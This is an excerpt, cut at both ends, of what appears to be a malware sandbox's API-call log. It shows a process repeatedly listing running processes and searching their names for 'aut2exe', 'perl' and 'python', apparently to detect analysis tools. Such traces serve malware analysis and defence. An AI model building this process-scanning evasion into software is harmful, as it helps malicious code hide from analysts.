returned 0x0 [0056.188] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0056.189] StrStrIW (lpFirst="dllhost.exe", lpSrch="aut2exe") returned 0x0 [0056.189] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0056.189] StrStrIW (lpFirst="dllhost.exe", lpSrch="aut2exe") returned 0x0 [0056.189] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x990, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="Tax Tool.exe")) returned 1 [0056.190] StrStrIW (lpFirst="Tax Tool.exe", lpSrch="aut2exe") returned 0x0 [0056.190] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0056.191] StrStrIW (lpFirst="taskhostw.exe", lpSrch="aut2exe") returned 0x0 [0056.191] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 0 [0056.191] CloseHandle (hObject=0x1e0) returned 1 [0056.191] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e0 [0056.196] Process32FirstW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0056.218] StrStrIW (lpFirst="[System Process]", lpSrch="perl") returned 0x0 [0056.218] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0056.218] StrStrIW (lpFirst="System", lpSrch="perl") returned 0x0 [0056.219] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0056.219] StrStrIW (lpFirst="smss.exe", lpSrch="perl") returned 0x0 [0056.219] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0056.220] StrStrIW (lpFirst="csrss.exe", lpSrch="perl") returned 0x0 [0056.220] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0056.220] StrStrIW (lpFirst="wininit.exe", lpSrch="perl") returned 0x0 [0056.220] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0056.221] StrStrIW (lpFirst="csrss.exe", lpSrch="perl") returned 0x0 [0056.221] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0056.222] StrStrIW (lpFirst="winlogon.exe", lpSrch="perl") returned 0x0 [0056.222] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0056.225] StrStrIW (lpFirst="services.exe", lpSrch="perl") returned 0x0 [0056.225] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0056.226] StrStrIW (lpFirst="lsass.exe", lpSrch="perl") returned 0x0 [0056.226] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.226] StrStrIW (lpFirst="svchost.exe", lpSrch="perl") returned 0x0 [0056.227] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.227] StrStrIW (lpFirst="svchost.exe", lpSrch="perl") returned 0x0 [0056.227] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c4, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0056.228] StrStrIW (lpFirst="dwm.exe", lpSrch="perl") returned 0x0 [0056.229] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.229] StrStrIW (lpFirst="svchost.exe", lpSrch="perl") returned 0x0 [0056.229] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.230] StrStrIW (lpFirst="svchost.exe", lpSrch="perl") returned 0x0 [0056.230] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x354, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.230] StrStrIW (lpFirst="svchost.exe", lpSrch="perl") returned 0x0 [0056.230] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.231] StrStrIW (lpFirst="svchost.exe", lpSrch="perl") returned 0x0 [0056.231] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.232] StrStrIW (lpFirst="svchost.exe", lpSrch="perl") returned 0x0 [0056.232] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.232] StrStrIW (lpFirst="svchost.exe", lpSrch="perl") returned 0x0 [0056.232] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0056.233] StrStrIW (lpFirst="spoolsv.exe", lpSrch="perl") returned 0x0 [0056.233] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.234] StrStrIW (lpFirst="svchost.exe", lpSrch="perl") returned 0x0 [0056.234] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x550, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.234] StrStrIW (lpFirst="svchost.exe", lpSrch="perl") returned 0x0 [0056.234] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0056.235] StrStrIW (lpFirst="sihost.exe", lpSrch="perl") returned 0x0 [0056.235] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x728, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0056.235] StrStrIW (lpFirst="taskhostw.exe", lpSrch="perl") returned 0x0 [0056.235] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0056.236] StrStrIW (lpFirst="explorer.exe", lpSrch="perl") returned 0x0 [0056.236] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0056.236] StrStrIW (lpFirst="RuntimeBroker.exe", lpSrch="perl") returned 0x0 [0056.236] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0056.237] StrStrIW (lpFirst="ShellExperienceHost.exe", lpSrch="perl") returned 0x0 [0056.237] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0056.238] StrStrIW (lpFirst="SearchUI.exe", lpSrch="perl") returned 0x0 [0056.238] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.238] StrStrIW (lpFirst="svchost.exe", lpSrch="perl") returned 0x0 [0056.238] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x320, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0056.239] StrStrIW (lpFirst="UsoClient.exe", lpSrch="perl") returned 0x0 [0056.239] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x320, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0056.239] StrStrIW (lpFirst="taskhostw.exe", lpSrch="perl") returned 0x0 [0056.240] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0056.240] StrStrIW (lpFirst="WMIADAP.exe", lpSrch="perl") returned 0x0 [0056.240] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0056.241] StrStrIW (lpFirst="sppsvc.exe", lpSrch="perl") returned 0x0 [0056.241] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x718, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.241] StrStrIW (lpFirst="conhost.exe", lpSrch="perl") returned 0x0 [0056.241] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x414, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0056.242] StrStrIW (lpFirst="backgroundTaskHost.exe", lpSrch="perl") returned 0x0 [0056.242] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0056.242] StrStrIW (lpFirst="backgroundTaskHost.exe", lpSrch="perl") returned 0x0 [0056.242] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0056.243] StrStrIW (lpFirst="WmiPrvSE.exe", lpSrch="perl") returned 0x0 [0056.243] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0056.244] StrStrIW (lpFirst="dllhost.exe", lpSrch="perl") returned 0x0 [0056.244] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0056.244] StrStrIW (lpFirst="audiodg.exe", lpSrch="perl") returned 0x0 [0056.245] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.245] StrStrIW (lpFirst="svchost.exe", lpSrch="perl") returned 0x0 [0056.245] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0056.246] StrStrIW (lpFirst="dllhost.exe", lpSrch="perl") returned 0x0 [0056.246] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0056.246] StrStrIW (lpFirst="dllhost.exe", lpSrch="perl") returned 0x0 [0056.246] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x990, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="Tax Tool.exe")) returned 1 [0056.247] StrStrIW (lpFirst="Tax Tool.exe", lpSrch="perl") returned 0x0 [0056.247] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0056.247] StrStrIW (lpFirst="taskhostw.exe", lpSrch="perl") returned 0x0 [0056.247] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 0 [0056.248] CloseHandle (hObject=0x1e0) returned 1 [0056.248] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e0 [0056.252] Process32FirstW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0056.253] StrStrIW (lpFirst="[System Process]", lpSrch="python") returned 0x0 [0056.253] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0056.256] StrStrIW (lpFirst="System", lpSrch="python") returned 0x0 [0056.256] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0056.257] StrStrIW (lpFirst="smss.exe", lpSrch="python") returned 0x0 [0056.257] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0056.257] StrStrIW (lpFirst="csrss.exe", lpSrch="python") returned 0x0 [0056.257] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0056.258] StrStrIW (lpFirst="wininit.exe", lpSrch="python") returned 0x0 [0056.258] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0056.258] StrStrIW (lpFirst="csrss.exe", lpSrch="python") returned 0x0 [0056.259] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0056.260] StrStrIW (lpFirst="winlogon.exe", lpSrch="python") returned 0x0 [0056.260] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0056.260] StrStrIW (lpFirst="services.exe", lpSrch="python") returned 0x0 [0056.260] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0056.261] StrStrIW (lpFirst="lsass.exe", lpSrch="python") returned 0x0 [0056.261] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.261] StrStrIW (lpFirst="svchost.exe", lpSrch="python") returned 0x0 [0056.261] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.262] StrStrIW (lpFirst="svchost.exe", lpSrch="python") returned 0x0 [0056.262] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c4, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0056.263] StrStrIW (lpFirst="dwm.exe", lpSrch="python") returned 0x0 [0056.263] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.263] StrStrIW (lpFirst="svchost.exe", lpSrch="python") returned 0x0 [0056.263] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.264] StrStrIW (lpFirst="svchost.exe", lpSrch="python") returned 0x0 [0056.264] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x354, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.264] StrStrIW (lpFirst="svchost.exe", lpSrch="python") returned 0x0 [0056.264] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.265] StrStrIW (lpFirst="svchost.exe", lpSrch="python") returned 0x0 [0056.265] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.268] StrStrIW (lpFirst="svchost.exe", lpSrch="python") returned 0x0 [0056.268] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.269] StrStrIW (lpFirst="svchost.exe", lpSrch="python") returned 0x0 [0056.269] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, 